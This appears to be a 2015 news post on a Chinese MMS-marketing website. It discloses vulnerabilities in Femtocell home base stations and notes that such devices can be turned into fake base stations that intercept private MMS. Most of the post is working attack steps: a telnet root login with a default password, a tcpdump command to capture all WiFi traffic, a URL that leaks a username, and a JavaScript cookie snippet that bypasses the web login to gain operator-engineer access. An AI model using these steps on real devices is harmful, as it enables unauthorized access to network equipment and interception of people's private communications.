欢迎您来到121营销!
彩信群发咨询电话:400-5566-521
行业动态

Industry trends

当前位置: 首页 > 彩信群发行业动态 >

家庭基站Femtocell截获任意彩信漏洞,危及公众移动通信安全

发布时间 :2015-11-23 来源 : 121营销平台
  移动互联网发展到帐用户对彩信、通话、数据流需求剧增,转向互动任意彩信需求,而Femtocell设备可以被改造成伪基站彩信群发器,截取家庭任意彩信隐私,移动彩信安全通信漏洞凸显。
  近日,有部分运营商通报Femtocell虽能瞬间解决室内ip网络覆盖问题,但是漏洞问题百出,很多厂家已经对全网设备进行紧急修复,漏洞暂时已经修复完成,但是漏洞问题还会存在吗?
  121营销揭秘Femtocell任意漏洞三大细节:
  ①root弱密码
  可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
  $ telnet 192.168.197.1
  login: root
  password: 5up
  顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。
  并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
  于是,可以直接抓取到所有连上此WiFi的流量:
  busybox tcpdump -i br0 not port 23
  ② 其它利用方式
  /mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
  闪灯 /mnt/flash/led_ctrl.sh [on|off]
  ③ RF 板卡渗透:Web 登录绕过
  访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
  abmoc@24320
  然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
  SetCookie('role', 'marketUser');
  SetCookie('username', 'abmoc@24320');
  SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
  document.cookie = "loginFlag=1;";
  window.top.location = 'main.asp?r=' + Math.random() + '#index';
  登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
网站LOGO
扫一扫,加入121营销应用讨论!
  • 121营销新浪企业微博

    121营销新浪企业微博

  • 121营销官方微信二维码

    121营销官方微信

  • [121营销平台]版权所有. 友链申请,联系QQ:53685121 .

    Copyright © 2004 - 2020 duanxin121. All Rights Reserved. | 网站地图          豫公网安备

    热线咨询:4005566521